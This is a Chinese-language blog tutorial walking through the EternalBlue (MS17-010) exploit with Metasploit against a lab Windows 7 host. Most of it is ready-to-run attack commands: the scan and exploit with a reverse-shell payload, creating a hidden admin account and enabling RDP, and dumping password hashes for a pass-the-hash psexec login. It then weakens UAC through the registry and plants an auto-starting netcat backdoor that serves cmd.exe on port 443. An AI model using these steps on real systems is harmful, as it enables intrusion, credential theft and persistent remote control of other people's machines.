【金典漏洞01】——— 永恒之蓝(ms17_010)

[top]

1. 什么是永恒之蓝

简单理解,就是恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。


勒索病毒.jpeg

蓝的来源.png

2. 使用MSF复现永恒之蓝,拿到shell

2.1本文整体思路

整体流程.png

2.2 包含内容

入侵流程
入侵后的远程桌面登录
入侵后的账号密码登录后台运行
入侵后的自启动木马植入,链接木马控制目标

3. 开干

目标:win7
ip:192.168.1.21
445端口开放

攻击机:kali
ip:192.168.1.22

命令总结:

拿下目标流程命令

msfdb run 启动
use auxiliary/scanner/smb/smb_ms17_010 使用扫描
set RHOSTS 192.168.1.21 设置目标
run 扫描
use exploit/windows/smb/ms17_010_eternalblue 使用攻击
set payload windows/x64/meterpreter/reverse_tcp 设置负载
set RHOSTS 192.168.1.21 设置目标
run 攻击
shell 进入目标cmd中

远程桌面登录

getuid 查看权限
shell 进入目标cmd
chcp 65001 更改编码规则
net user hack 123123 创建新用户
net localgroup administrators hack /add 添加用户权限
exit 退出cmd
run post/windows/manage/enable_rdp NAEM=hack PASSWORD=123123 启动远程登录功能
rdesktop 192.168.1.21 kali新开rdp链接

使用哈希值登录目标

hashdump 获取hash密码
background 后台运行
use exploit/windows/smb/psexec 使用攻击模块
set payload windows/meterpreter/reverse_tcp 设置负载
show options 查看设置项
set rhosts 192.168.1.21 设置目标ip
set smbpass aad3b435b51404eeaad...... 设置哈希密码
set smbuser Administrator 设置用户
set lhost 192.168.1.22 本地ip
run

植入开机自启动木马,远程登录

shell
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f 开启UAC
exit
upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32 nc后门程序放在目标上
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe' 设置后门开机自启动
netsh firewall add portopening TCP 443 "hack443" ENABLE ALL cmd开启后门链接的443端口
shutdown -r -f -t 0 重启目标,UAC、木马生效
nc -v 192.168.1.21 443 NC链接
connect 192.168.1.21 443 msf链接

3.1 启动kali的msf扫描ms17_010漏洞

1. 开启MSF:msfdb run 或 msfconsole

启动成功.png

2. 搜索ms17_010相关内容

永恒之蓝相关模块.png

3. 使用扫描模块扫描目标是否可被攻击

  1. 使用模块
use 3 //前面的扫描结果序号

或者

use auxiliary/scanner/smb/smb_ms17_010
  1. 查看需要设置内容
    show options
    set RHOSTS 192.168.1.21
    需要设置的内容.png
  • Required 选项是yes的是必填选项
  • RHOSTS 目标的ip地址


    设置目标ip.png
  1. 开始扫描 runexploit
    存在漏洞.png

4. 使用攻击模块(搜索处可查)

  1. 使用exp攻击模块 use exploit/windows/smb/ms17_010_eternalblue
    使用永恒之蓝攻击模块.png
  • 之前版本中需要单独set payload,现在版本默认设置了payload
  1. 设置payload set payload、设置目标ip
    设置payload.png
  • payload中默认的本地的ip所有不用再设置了

5. 开始执行攻击

runexploit

攻击成功.png

成功拿下这台机器!

这里已经得到了这台机器的控制权,接下来是属于其他操作

3.2 开启对目标的控制

1. 远程桌面登录(目标会感知)

  • 前期准备


    前期准备.png
  • 启动后渗透
    run post/windows/manage/enable_rdp USERNAME=test PASSWORD=aabbcc
    开启后渗透,可远程桌面连接.png
  • kali远程登录
    rdesktop 192.168.1.21
    启动远程桌面登录.png

    登录页面.png
  • 正常情况下是可以直接登录了
  • 如果输入账号密码后提示权限不足则执行 net localgroup administrators new /add
提升管理员权限.png

再桌面登录
登录成功


远程登录成功.png

2. 哈希值后台登录(后台运行,目标无感知)

  • 先获取哈希值hashdump 并后台运行 background
    [注意哈希是是红线标注部分,:*****::: 的 ***** 部分]
    得到哈希值.png
  • 设置攻击模块和负载模块,并且查看需要设置的内容
    use exploit/windows/smb/psexec
    set payload windows/meterpreter/reverse_tcp
    show options
    image.png
  • 设置相关内容
    set rhosts 192.168.1.21 设置目标ip
    set smbpass aad3b435b51404eeaad...... 设置哈希密码
    set smbuser Administrator 设置用户
    set lhost 192.168.1.22 本地ip
    设置攻击模块参数.png
  • 开始攻击 run
    攻击成功.png

此时就是哈希密码登录目标

3. 植入自启动后门程序,实现后台运行

  • 进入cmd 开启UAC,返回meterpreter
    shell
    cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
    exit
    开启UAC.png
  • 将nc后门程序放在目标上
    upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
    上传nc后门.png
  • 设置后门开机自启动,cmd开启后门链接的443端口

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'

netsh firewall add portopening TCP 443 "hack443" ENABLE ALL

设置木马程序.png

* 此时需要重启目标主机,重启后只要目标登录上了主机就可用nc或者msf远程直接链接,不需要exp
  • 目标重启后登录,分别使用NC和msf链接目标
    nc -v 192.168.1.21 443 NC链接
    connect 192.168.1.21 443 msf链接
    nc链接目标.png

    msf链接目标.png

到此完结撒花

你可能感兴趣的:(【金典漏洞01】——— 永恒之蓝(ms17_010))